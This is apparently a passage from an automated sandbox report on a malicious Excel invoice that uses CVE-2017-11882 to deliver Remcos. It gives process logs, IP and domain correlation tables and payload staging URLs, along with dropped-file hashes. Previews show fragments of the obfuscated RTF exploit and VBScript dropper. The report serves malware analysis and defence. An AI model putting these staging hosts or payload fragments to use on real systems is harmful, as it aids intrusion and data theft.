                      • Override analysis time to 97111.5946565943 for current running targets taking high CPU consumption
                      • Override analysis time to 194223.189313189 for current running targets taking high CPU consumption
                      • Exclude process from analysis (whitelisted): mrxdav.sys, dllhost.exe, rundll32.exe, WMIADAP.exe, conhost.exe
                      • Execution Graph export aborted for target EQNEDT32.EXE, PID 4084 because there are no executed function
                      • Execution Graph export aborted for target powershell.exe, PID 3264 because it is empty
                      • Not all processes where analyzed, report is missing behavior information
                      • Report size exceeded maximum capacity and may have missing behavior information.
                      • Report size exceeded maximum capacity and may have missing disassembly code.
                      • Report size getting too big, too many NtOpenKeyEx calls found.
                      • Report size getting too big, too many NtQueryValueKey calls found.
                      • Report size getting too big, too many NtReadVirtualMemory calls found.
                      • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                      • VT rate limit hit for: August Shipment - Inv No. 041.xls
                      TimeTypeDescription
                      08:00:40API Interceptor40x Sleep call for process: EQNEDT32.EXE modified
                      08:00:42API Interceptor10x Sleep call for process: wscript.exe modified
                      08:00:43API Interceptor112x Sleep call for process: powershell.exe modified
                      08:00:53API Interceptor9944910x Sleep call for process: RegAsm.exe modified
                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      137.184.234.91SecuriteInfo.com.Exploit.CVE-2017-11882.123.32304.23264.rtfGet hashmaliciousRemcosBrowse
                      • 137.184.234.91/77/RBCF.txt
                      M12_20240821.xlsGet hashmaliciousRemcosBrowse
                      • 137.184.234.91/58/CCNO.txt
                      207.241.232.154SecuriteInfo.com.Exploit.CVE-2017-11882.123.32304.23264.rtfGet hashmaliciousRemcosBrowse
                        PO_304234.xlsGet hashmaliciousRemcosBrowse
                          RFQ No. 109078906v.xla.xlsxGet hashmaliciousRemcosBrowse
                            SecuriteInfo.com.Exploit.CVE-2017-11882.123.24463.26706.rtfGet hashmaliciousRemcosBrowse
                              SecuriteInfo.com.Exploit.CVE-2017-11882.123.10965.14600.rtfGet hashmaliciousRemcosBrowse
                                another.rtfGet hashmaliciousRemcosBrowse
                                  Faktura.vbsGet hashmaliciousRemcosBrowse
                                    M12_20240821.xlsGet hashmaliciousRemcosBrowse
                                      PO_20931.xlsGet hashmaliciousRemcosBrowse
                                        PO082724.xlsGet hashmaliciousRemcosBrowse
                                          45.90.89.98SecuriteInfo.com.Exploit.CVE-2017-11882.123.32304.23264.rtfGet hashmaliciousRemcosBrowse
                                            M12_20240821.xlsGet hashmaliciousRemcosBrowse
                                              oothgirl.docGet hashmaliciousRemcosBrowse
                                                M12_20240821_0.xlsGet hashmaliciousRemcosBrowse
                                                  SecuriteInfo.com.Exploit.CVE-2017-11882.123.8441.24466.rtfGet hashmaliciousRemcosBrowse
                                                    M12_20240821_06212.xlsGet hashmaliciousRemcosBrowse
                                                      SecuriteInfo.com.Exploit.CVE-2017-11882.123.11787.15148.rtfGet hashmaliciousRemcosBrowse
                                                        wire_receipt.xlsGet hashmaliciousRemcosBrowse
                                                          SecuriteInfo.com.Exploit.Rtf.Obfuscated.32.26325.9717.rtfGet hashmaliciousRemcosBrowse
                                                            SWT20240506_12082.xlsGet hashmaliciousRemcosBrowse
                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                              ia803104.us.archive.orgSecuriteInfo.com.Exploit.CVE-2017-11882.123.32304.23264.rtfGet hashmaliciousRemcosBrowse
                                                              • 207.241.232.154
                                                              PO_304234.xlsGet hashmaliciousRemcosBrowse
                                                              • 207.241.232.154
                                                              RFQ No. 109078906v.xla.xlsxGet hashmaliciousRemcosBrowse
                                                              • 207.241.232.154
                                                              SecuriteInfo.com.Exploit.CVE-2017-11882.123.24463.26706.rtfGet hashmaliciousRemcosBrowse
                                                              • 207.241.232.154
                                                              SecuriteInfo.com.Exploit.CVE-2017-11882.123.10965.14600.rtfGet hashmaliciousRemcosBrowse
                                                              • 207.241.232.154
                                                              another.rtfGet hashmaliciousRemcosBrowse
                                                              • 207.241.232.154
                                                              Faktura.vbsGet hashmaliciousRemcosBrowse
                                                              • 207.241.232.154
                                                              M12_20240821.xlsGet hashmaliciousRemcosBrowse
                                                              • 207.241.232.154
                                                              PO_20931.xlsGet hashmaliciousRemcosBrowse
                                                              • 207.241.232.154
                                                              PO082724.xlsGet hashmaliciousRemcosBrowse
                                                              • 207.241.232.154
                                                              geoplugin.netSecuriteInfo.com.Exploit.CVE-2017-11882.123.32304.23264.rtfGet hashmaliciousRemcosBrowse
                                                              • 178.237.33.50
                                                              SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exeGet hashmaliciousRemcosBrowse
                                                              • 178.237.33.50
                                                              PO_304234.xlsGet hashmaliciousRemcosBrowse
                                                              • 178.237.33.50
                                                              RFQ No. 109078906v.xla.xlsxGet hashmaliciousRemcosBrowse
                                                              • 178.237.33.50
                                                              SecuriteInfo.com.Exploit.CVE-2017-11882.123.24463.26706.rtfGet hashmaliciousRemcosBrowse
                                                              • 178.237.33.50
                                                              SecuriteInfo.com.Exploit.CVE-2017-11882.123.10965.14600.rtfGet hashmaliciousRemcosBrowse
                                                              • 178.237.33.50
                                                              another.rtfGet hashmaliciousRemcosBrowse
                                                              • 178.237.33.50
                                                              rnr.exeGet hashmaliciousRemcosBrowse
                                                              • 178.237.33.50
                                                              thrylPXnvfySmGN.exeGet hashmaliciousRemcosBrowse
                                                              • 178.237.33.50
                                                              SecuriteInfo.com.BackDoor.AgentTeslaNET.37.11054.31488.exeGet hashmaliciousRemcosBrowse
                                                              • 178.237.33.50
                                                              a38.frRFQ No. 109078906.xla.xlsxGet hashmaliciousUnknownBrowse
                                                              • 45.83.105.92
                                                              RFQ No. 109078906.xla.xlsxGet hashmaliciousUnknownBrowse
                                                              • 45.83.105.92
                                                              RFQ No. 109078906.xla.xlsxGet hashmaliciousUnknownBrowse
                                                              • 45.83.105.92
                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                              CMCSUSSecuriteInfo.com.Exploit.CVE-2017-11882.123.32304.23264.rtfGet hashmaliciousRemcosBrowse
                                                              • 45.90.89.98
                                                              file.exeGet hashmaliciousRHADAMANTHYS, XWormBrowse
                                                              • 85.209.133.150
                                                              M12_20240821.xlsGet hashmaliciousRemcosBrowse
                                                              • 45.90.89.98
                                                              7jJ5MmlHbSHkdkHmvUSAjcUp2P2shzjYzN.elfGet hashmaliciousUnknownBrowse
                                                              • 95.214.27.215
                                                              5W1oMx0mvDdA5qxT1IJjtPL48vEFbOM1gh.elfGet hashmaliciousUnknownBrowse
                                                              • 95.214.27.215
                                                              b4JF06gZTMJpnYlsUOImGOM77xqMU1h8u3.elfGet hashmaliciousUnknownBrowse
                                                              • 95.214.27.215
                                                              FtxaQtUvjBYIMfEEaq6CUaPLqJCNXnjMDz.elfGet hashmaliciousUnknownBrowse
                                                              • 95.214.27.215
                                                              f4rgX4ruBw0IqdorzUGWIF1EBpCY4DpfH7.elfGet hashmaliciousUnknownBrowse
                                                              • 95.214.27.215
                                                              E2DOzYCJe9OYVW5SsJ2Jg6aTHfwMbZ7cur.elfGet hashmaliciousUnknownBrowse
                                                              • 95.214.27.215
                                                              g92VW6HmXFjoaY59hp7I27MOMpwpqH3P9p.elfGet hashmaliciousUnknownBrowse
                                                              • 95.214.27.215
                                                              PANDGUSSecuriteInfo.com.Exploit.CVE-2017-11882.123.32304.23264.rtfGet hashmaliciousRemcosBrowse
                                                              • 137.184.234.91
                                                              M12_20240821.xlsGet hashmaliciousRemcosBrowse
                                                              • 137.184.234.91
                                                              firmware.sh4.elfGet hashmaliciousUnknownBrowse
                                                              • 155.111.50.210
                                                              KKveTTgaAAsecNNaaaa.mpsl.elfGet hashmaliciousUnknownBrowse
                                                              • 155.119.181.132
                                                              KKveTTgaAAsecNNaaaa.mips.elfGet hashmaliciousUnknownBrowse
                                                              • 143.5.226.127
                                                              KKveTTgaAAsecNNaaaa.arm.elfGet hashmaliciousUnknownBrowse
                                                              • 155.126.240.144
                                                              KKveTTgaAAsecNNaaaa.i686.elfGet hashmaliciousUnknownBrowse
                                                              • 151.217.7.237
                                                              https://na4.documents.adobe.com/public/esign?tsid=CBFCIBAACBSCTBABDUAAABACAABAAgtmudCdipeGj991qUjM8egV6814sux3rgVxmpQ9ZUPP1ghEiBFZhGbeUOXRNN8jh0-dHyQbAhKeqZWA47C7EGYTdl0WfoRVsVtug9eoPZA7XQynIL6EntGVhDjys02My&Get hashmaliciousHTMLPhisherBrowse
                                                              • 137.184.83.89
                                                              SecuriteInfo.com.Linux.Siggen.9999.2027.4559.elfGet hashmaliciousMiraiBrowse
                                                              • 143.39.105.100
                                                              Hanh_AbstractCopy_____.htmGet hashmaliciousHTMLPhisherBrowse
                                                              • 137.184.236.106
                                                              INTERNET-ARCHIVEUSSecuriteInfo.com.Exploit.CVE-2017-11882.123.32304.23264.rtfGet hashmaliciousRemcosBrowse
                                                              • 207.241.232.154
                                                              PO_304234.xlsGet hashmaliciousRemcosBrowse
                                                              • 207.241.232.154
                                                              RFQ No. 109078906v.xla.xlsxGet hashmaliciousRemcosBrowse
                                                              • 207.241.232.154
                                                              SecuriteInfo.com.Exploit.CVE-2017-11882.123.24463.26706.rtfGet hashmaliciousRemcosBrowse
                                                              • 207.241.232.154
                                                              SecuriteInfo.com.Exploit.CVE-2017-11882.123.10965.14600.rtfGet hashmaliciousRemcosBrowse
                                                              • 207.241.232.154
                                                              another.rtfGet hashmaliciousRemcosBrowse
                                                              • 207.241.232.154
                                                              Faktura.vbsGet hashmaliciousRemcosBrowse
                                                              • 207.241.232.154
                                                              M12_20240821.xlsGet hashmaliciousRemcosBrowse
                                                              • 207.241.232.154
                                                              PO_20931.xlsGet hashmaliciousRemcosBrowse
                                                              • 207.241.232.154
                                                              PO082724.xlsGet hashmaliciousRemcosBrowse
                                                              • 207.241.232.154
                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                              05af1f5ca1b87cc9cc9b25185115607dSecuriteInfo.com.Exploit.CVE-2017-11882.123.32304.23264.rtfGet hashmaliciousRemcosBrowse
                                                              • 45.83.105.92
                                                              • 207.241.232.154
                                                              PO_304234.xlsGet hashmaliciousRemcosBrowse
                                                              • 45.83.105.92
                                                              • 207.241.232.154
                                                              RFQ No. 109078906v.xla.xlsxGet hashmaliciousRemcosBrowse
                                                              • 45.83.105.92
                                                              • 207.241.232.154
                                                              SecuriteInfo.com.Exploit.CVE-2017-11882.123.24463.26706.rtfGet hashmaliciousRemcosBrowse
                                                              • 45.83.105.92
                                                              • 207.241.232.154
                                                              SecuriteInfo.com.Exploit.CVE-2017-11882.123.10965.14600.rtfGet hashmaliciousRemcosBrowse
                                                              • 45.83.105.92
                                                              • 207.241.232.154
                                                              another.rtfGet hashmaliciousRemcosBrowse
                                                              • 45.83.105.92
                                                              • 207.241.232.154
                                                              M12_20240821.xlsGet hashmaliciousRemcosBrowse
                                                              • 45.83.105.92
                                                              • 207.241.232.154
                                                              PO_20931.xlsGet hashmaliciousRemcosBrowse
                                                              • 45.83.105.92
                                                              • 207.241.232.154
                                                              350.xlsGet hashmaliciousFormBookBrowse
                                                              • 45.83.105.92
                                                              • 207.241.232.154
                                                              PO082724.xlsGet hashmaliciousRemcosBrowse
                                                              • 45.83.105.92
                                                              • 207.241.232.154
                                                              7dcce5b76c8b17472d024758970a406bThermo Fisher RFQ_TFS-1805.xlsGet hashmaliciousGuLoaderBrowse
                                                              • 45.83.105.92
                                                              PO_304234.xlsGet hashmaliciousRemcosBrowse
                                                              • 45.83.105.92
                                                              RFQ No. 109078906v.xla.xlsxGet hashmaliciousRemcosBrowse
                                                              • 45.83.105.92
                                                              RFQ No. 109078906.xla.xlsxGet hashmaliciousUnknownBrowse
                                                              • 45.83.105.92
                                                              M12_20240821.xlsGet hashmaliciousRemcosBrowse
                                                              • 45.83.105.92
                                                              RFQ No. 109078906.xla.xlsxGet hashmaliciousUnknownBrowse
                                                              • 45.83.105.92
                                                              PO_20931.xlsGet hashmaliciousRemcosBrowse
                                                              • 45.83.105.92
                                                              350.xlsGet hashmaliciousFormBookBrowse
                                                              • 45.83.105.92
                                                              PO082724.xlsGet hashmaliciousRemcosBrowse
                                                              • 45.83.105.92
                                                              Inv 30532.xlsGet hashmaliciousRemcosBrowse
                                                              • 45.83.105.92
                                                              No context
                                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):131072
                                                              Entropy (8bit):0.025630452914884125
                                                              Encrypted:false
                                                              SSDEEP:6:I3DPcBaixFvxggLRVLHWKV3djRXv//4tfnRujlw//+GtluJ/eRuj:I3DPQagAKhvYg3J/
                                                              MD5:C252354C637F952E4B56C30BE80234D0
                                                              SHA1:590EBCCF0B7CB6966A3F86F489DCD87CF8B1E42B
                                                              SHA-256:D9DB16DD6338380FD13A190E63176D4E2CEBF5A12783050E1260525D8BDD6BB2
                                                              SHA-512:FB2E102B778F3E77648865032B63CB962F24B5DC69BDD7B16F425FC5DC1825E63EE1A8475008D8FF12F0E79B6BEC9AEF894AA6419A820D414D01907375EE2B9C
                                                              Malicious:false
                                                              Reputation:low
                                                              Preview:......M.eFy...z.r.mb .N.H#..'!aS,...X.F...Fa.q..............................l.n.5A...;.K.4........a.x~f.I..l.lUv.....................................................................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):4760
                                                              Entropy (8bit):4.834060479684549
                                                              Encrypted:false
                                                              SSDEEP:96:RCJ2Woe5u2k6Lm5emmXIGxgyg12jDs+un/iQLEYFjDaeWJ6KGcmXSFRLcU6/KD:cxoe5uVsm5emdOgkjDt4iWN3yBGHydcY
                                                              MD5:838C1F472806CF4BA2A9EC49C27C2847
                                                              SHA1:D1C63579585C4740956B099697C74AD3E7C89751
                                                              SHA-256:40A844E6AF823D9E71A35DFEE1FF7383D8A682E9981FB70440CA47AA1F6F1FF3
                                                              SHA-512:E784B61696AB19C5A178204A11E4012A9A29D58B3D3BF1D5648021693883FFF343C87777E7A2ADC81B833148B90B88E60948B370D2BB99DEC70C097B5C91B145
                                                              Malicious:false
                                                              Preview:PSMODULECACHE............Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script...............T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):64
                                                              Entropy (8bit):0.34726597513537405
                                                              Encrypted:false
                                                              SSDEEP:3:Nlll:Nll
                                                              MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                              SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                              SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                              SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                              Malicious:false
                                                              Preview:@...e...........................................................
                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                              File Type:JSON data
                                                              Category:dropped
                                                              Size (bytes):962
                                                              Entropy (8bit):5.013811273052389
                                                              Encrypted:false
                                                              SSDEEP:12:tklu+mnd6CsGkMyGWKyGXPVGArwY307f7aZHI7GZArpv/mOAaNO+ao9W7iN5zzkk:qlu+KdRNuKyGX85jvXhNlT3/7AcV9Wro
                                                              MD5:18BC6D34FABB00C1E30D98E8DAEC814A
                                                              SHA1:D21EF72B8421AA7D1F8E8B1DB1323AA93B884C54
                                                              SHA-256:862D5523F77D193121112B15A36F602C4439791D03E24D97EF25F3A6CBE37ED0
                                                              SHA-512:8DF14178B08AD2EDE670572394244B5224C8B070199A4BD851245B88D4EE3D7324FC7864D180DE85221ADFBBCAACB9EE9D2A77B5931D4E878E27334BF8589D71
                                                              Malicious:false
                                                              Preview:{. "geoplugin_request":"8.46.123.33",. "geoplugin_status":200,. "geoplugin_delay":"1ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"New York",. "geoplugin_region":"New York",. "geoplugin_regionCode":"NY",. "geoplugin_regionName":"New York",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"501",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"40.7123",. "geoplugin_longitude":"-74.0068",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}
                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                              File Type:Rich Text Format data, version 1
                                                              Category:dropped
                                                              Size (bytes):51640
                                                              Entropy (8bit):3.638030645398928
                                                              Encrypted:false
                                                              SSDEEP:384:Y3Xgs583QWCpK6fVGe7VnSBPu8hMfbfz2L8qvWAR3sv3gAOFd8geI7YTsfuImRkp:gZSb6nnS50bLAvWMJ7IkWgP
                                                              MD5:3D01ED0FBD007AE72097E0054E330CBD
                                                              SHA1:78720870C21366C6713B8F1D776F3497F8BEAF4D
                                                              SHA-256:701FDC68EE894BD3579C91EFC19F287B748AD744F49B1EC27774C47E7C24215F
                                                              SHA-512:4EF96900A34DC18224CED288478AA85852F53B24E3AAD690AD9220AB7E41E972F9E1B3B47D70883D601F5FAD356C2CAD4479BA6CCD1B3B3819F6F86F8E665C2B
                                                              Malicious:true
                                                              Yara Hits:
                                                              • Rule: INDICATOR_RTF_MalVer_Objects, Description: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents., Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\weneednewthingstogetmegreatthingsbuttersmoothchocolatecurnchiwaferwithnicebiscutwithentirethingstobegetmeback________newbuttersmoothbutter[1].doc, Author: ditekSHen
                                                              Antivirus:
                                                              • Antivirus: Avira, Detection: 100%
                                                              Preview:{\rtf1...............{\*\pInscribe273629363 \%}.{\911376054:'=@<([~?^~_1./`!)#.(:%/~)[!.|+<~8~!%'3|?#&>_=`#01_?-@~>>=%,@[/,3;8@+9+%>.=92`4[/2&?:5)/?&?#%?~_.:2$;35;84>,)../3[|38.=$2>]1.|?<=.!=//(]'+*|=_6!.+85?[/^%+]'|.[?..*8@/?=]~,76.?4!/7.][?.0^_#6,_2?.4*~*5/*1.80(65=<.$8^`_>/%)<?3?~?%?|])]?,.+4!?(.191))??&%_[?,.<^)|#.2%&??#>!:?)?14!'==$96`1~;?.>&%@%=&???8?%4%]#^-=<~5|^%3?0%.^5%..%.16<,(`^7|^<$4`1.2>?%)&.?.%|%[?^->777!?:%#/*)14!|!:<8..63/%@$>:1'35%/`,?!~2>*6@/12~?>98;9.5).%@=~?%_?!;;??`&?@?/!..50.>*8&6%|?@207^1(;*9|=@'?,5|7!5%^+?(?(6?%&&./<#<9+8<:[$6[;?/@-*?7*7.[8]%?[<?-_!<=.#!)9<27@?3!]?.!;4#??4|8?8>$00)9**948:>=[_7,`/&0.?.%%??.4)&.,8[[&3>080'-^88_8.[6%3&,`?6.5$1[??|?[2.`'^_#??%?.!&)1=>(9/~7?&<_84..(]).]#,`*<?@5,%._/4??.!)-!=2;'4;?/^.~#1%>?%2?+!$9_?,..-?_.+.<]~&?|@];).7?.;..-#.<?*1?9?%$)9)|???@.<==5/..>->?+#[).~&&^1#9<.!1(:1:%2.?#962990$1?|?5'82,#-?;$1.!(52](`[~^%/]|`^7:>&`:[!_#![?.=`^'_[-8.*/']@8<.3?.[!?%%)^?].;&?2?/.%%:*3~[^*;%~*|;??.>^!.%?):__3&],$9.-*<@?*3|`<?$8!%],.]:~4^?$45?2%<?
                                                              Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):182202
                                                              Entropy (8bit):3.841931638249334
                                                              Encrypted:false
                                                              SSDEEP:3072:OEfMV0+KP6TfljceGw28+3bQgt5pMGwpQy7IqK7hNU7oRhvIb7:RfMV0NP6TxUh3XNg4k7
                                                              MD5:25FA290C83C38B83D3E49E043C89BEB5
                                                              SHA1:715087372C4CD1816B29C89DD98B336EEAA0EE54
                                                              SHA-256:62980E48F844DADEF0FF04A151C9EBD5F5EE24E1606B7BB94230491907E8BE27
                                                              SHA-512:A92C00F0511C3EDC1E7C042734B703466279ACFF997936567BF247B1EB36A8265815F9352C72085B001EF1094C1E8A60CD414EE1DDC05A4A7B6F719757C5EC0C
                                                              Malicious:false
                                                              Preview:......m.n.W.L.t.g.i.b.L.k. .=. .".Z.Q.t.L.e.d.T.U.B.u.".....K.b.P.Z.Z.f.k.e.e.N. .=. .".u.z.K.L.o.G.v.t.j.N.".....e.x.A.W.i.m.W.C.p.c. .=. .".Q.i.b.s.B.s.O.c.i.B.".....G.A.L.d.h.c.S.c.K.L. .=. .".t.c.f.G.n.U.A.f.Z.L.".....A.f.i.l.f.s.i.b.H.W. .=. .".i.z.h.r.k.o.b.I.B.k.".....O.i.e.Z.d.L.a.x.k.c. .=. .".K.c.G.J.g.L.G.p.p.s.".....J.G.h.R.K.d.e.O.W.i. .=. .".W.j.L.U.H.b.k.G.k.b.".........i.L.k.A.o.L.z.L.U.c. .=. .".N.t.W.Z.U.C.z.W.W.k.".....i.W.k.O.c.c.q.L.A.d. .=. .".L.T.G.G.K.R.G.p.h.O.".....z.K.B.W.p.J.f.c.g.Z. .=. .".L.G.q.K.f.W.H.l.c.i.".....b.i.l.d.L.W.P.W.P.A. .=. .".W.H.L.P.P.W.W.m.p.b.".....A.n.r.W.b.L.R.p.b.i. .=. .".U.n.f.L.f.N.p.K.q.n.".....u.T.L.a.i.p.J.b.c.l. .=. .".n.z.c.W.L.K.e.l.G.N.".....i.q.L.R.P.x.L.K.h.i. .=. .".W.C.K.m.K.o.L.h.G.b.".....W.o.k.A.T.N.e.o.P.u. .=. .".k.f.q.p.j.T.r.r.U.o.".....l.r.n.x.v.x.t.d.d.L. .=. .".O.b.h.B.B.e.W.z.B.h.".....L.U.L.K.x.L.a.f.o.L. .=. .".p.L.G.L.g.K.R.z.W.i.".........G.K.J.A.f.U.Z.u.l.W. .=. .".W.a.O.a.u.d.L.f.f.s.".....Z.W.d.B.W.U.W.
                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                              File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                              Category:dropped
                                                              Size (bytes):43992
                                                              Entropy (8bit):3.1294934030074346
                                                              Encrypted:false
                                                              SSDEEP:384:3BsBItv8/6VeaqxqlSXlCafljdwesLP2M8a3YMnwavj8cx8aW/UvybJtI:qOt0CjTradBMLMoFwAlvyl6
                                                              MD5:A04AD4672986D123286665F16F244BEE
                                                              SHA1:EEBD4737030E88A37AF062195D2E9ACA993FE3FC
                                                              SHA-256:3B4A5CC2696A643AA41A30800114232FB89BEC8E8BCFA170DC521F2A99CB4C3F
                                                              SHA-512:B27EEFC4D790CB96BC9B17B8E1EBF1BCEF5BB9E7DBADED9F4A9C7E5FF0B0E8375CD46AF67D010F063DF390FB70F75A9774C59268BE94E6E91E2BEF7FAB6B46ED
                                                              Malicious:false
                                                              Preview:....l...........9...............~@..xW.. EMF...............................j.......................{.......F...,... ...EMF+.@..................X...X...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..............................................<.......%...........%...........R...p................................@. C.a.l.i.b.r.i..........................................................................................2%.........d.................................................................7......................@................C.a.l.i.b.r.i.......................................................................................dv......%...........%.......................R...p................................@."C.a.l.i.b.r.i.........................................................................................?.A...........P.......H.......P.......................H.......H.......P.......7......................@.N..............C.a.l.i.b.r.i...........
                                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                              File Type:Rich Text Format data, version 1
                                                              Category:dropped
                                                              Size (bytes):51640
                                                              Entropy (8bit):3.638030645398928
                                                              Encrypted:false
                                                              SSDEEP:384:Y3Xgs583QWCpK6fVGe7VnSBPu8hMfbfz2L8qvWAR3sv3gAOFd8geI7YTsfuImRkp:gZSb6nnS50bLAvWMJ7IkWgP
                                                              MD5:3D01ED0FBD007AE72097E0054E330CBD
                                                              SHA1:78720870C21366C6713B8F1D776F3497F8BEAF4D
                                                              SHA-256:701FDC68EE894BD3579C91EFC19F287B748AD744F49B1EC27774C47E7C24215F
                                                              SHA-512:4EF96900A34DC18224CED288478AA85852F53B24E3AAD690AD9220AB7E41E972F9E1B3B47D70883D601F5FAD356C2CAD4479BA6CCD1B3B3819F6F86F8E665C2B
                                                              Malicious:true
                                                              Yara Hits:
                                                              • Rule: INDICATOR_RTF_MalVer_Objects, Description: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents., Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4F3AD743.doc, Author: ditekSHen
                                                              Antivirus:
                                                              • Antivirus: Avira, Detection: 100%
                                                              Preview:{\rtf1...............{\*\pInscribe273629363 \%}.{\911376054:'=@<([~?^~_1./`!)#.(:%/~)[!.|+<~8~!%'3|?#&>_=`#01_?-@~>>=%,@[/,3;8@+9+%>.=92`4[/2&?:5)/?&?#%?~_.:2$;35;84>,)../3[|38.=$2>]1.|?<=.!=//(]'+*|=_6!.+85?[/^%+]'|.[?..*8@/?=]~,76.?4!/7.][?.0^_#6,_2?.4*~*5/*1.80(65=<.$8^`_>/%)<?3?~?%?|])]?,.+4!?(.191))??&%_[?,.<^)|#.2%&??#>!:?)?14!'==$96`1~;?.>&%@%=&???8?%4%]#^-=<~5|^%3?0%.^5%..%.16<,(`^7|^<$4`1.2>?%)&.?.%|%[?^->777!?:%#/*)14!|!:<8..63/%@$>:1'35%/`,?!~2>*6@/12~?>98;9.5).%@=~?%_?!;;??`&?@?/!..50.>*8&6%|?@207^1(;*9|=@'?,5|7!5%^+?(?(6?%&&./<#<9+8<:[$6[;?/@-*?7*7.[8]%?[<?-_!<=.#!)9<27@?3!]?.!;4#??4|8?8>$00)9**948:>=[_7,`/&0.?.%%??.4)&.,8[[&3>080'-^88_8.[6%3&,`?6.5$1[??|?[2.`'^_#??%?.!&)1=>(9/~7?&<_84..(]).]#,`*<?@5,%._/4??.!)-!=2;'4;?/^.~#1%>?%2?+!$9_?,..-?_.+.<]~&?|@];).7?.;..-#.<?*1?9?%$)9)|???@.<==5/..>->?+#[).~&&^1#9<.!1(:1:%2.?#962990$1?|?5'82,#-?;$1.!(52](`[~^%/]|`^7:>&`:[!_#![?.=`^'_[-8.*/']@8<.3?.[!?%%)^?].;&?2?/.%%:*3~[^*;%~*|;??.>^!.%?):__3&],$9.-*<@?*3|`<?$8!%],.]:~4^?$45?2%<?
                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                              File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                              Category:dropped
                                                              Size (bytes):4527404
                                                              Entropy (8bit):3.8573411297737294
                                                              Encrypted:false
                                                              SSDEEP:24576:OYNVUoJCoJeoJfoJuZLqAjBfBf6Fm+qw8W5/qIjB/Rfy5m+qw4/:OYNuoJCoJeoJfoJD
                                                              MD5:8A188A6917AD1FA0C7F1AA20A63C8593
                                                              SHA1:4D2270D647D4A3680B47E85501C7AB1442DDCBB2
                                                              SHA-256:728A3D9B1BEE7CD8BAA90AA0B1A4805A93238C8F835EA685931AC676BA7EF3E3
                                                              SHA-512:823246CAC3D8A45980CE0623C485FB0B74CE7AA68CCA37B22FEF1924685F1201298163C398688057736EC4551999B5455DB1C97ABC7DA97E5A07589CD4FD7CDF
                                                              Malicious:false
                                                              Preview:....l...............X................5.. EMF....,.E.........................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!......................................................."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................'.......................%...........................................................L...d...............N........... ...O...!..............?...........?................................'................ `.....%...........(.................... `.L...d...............N...........~...
                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                              File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                              Category:dropped
                                                              Size (bytes):4527404
                                                              Entropy (8bit):3.8573411297737294
                                                              Encrypted:false
                                                              SSDEEP:24576:OYNVUoJCoJeoJfoJuZLqAjBfBf6Fm+qw8W5/qIjB/Rfy5m+qw4/:OYNuoJCoJeoJfoJD
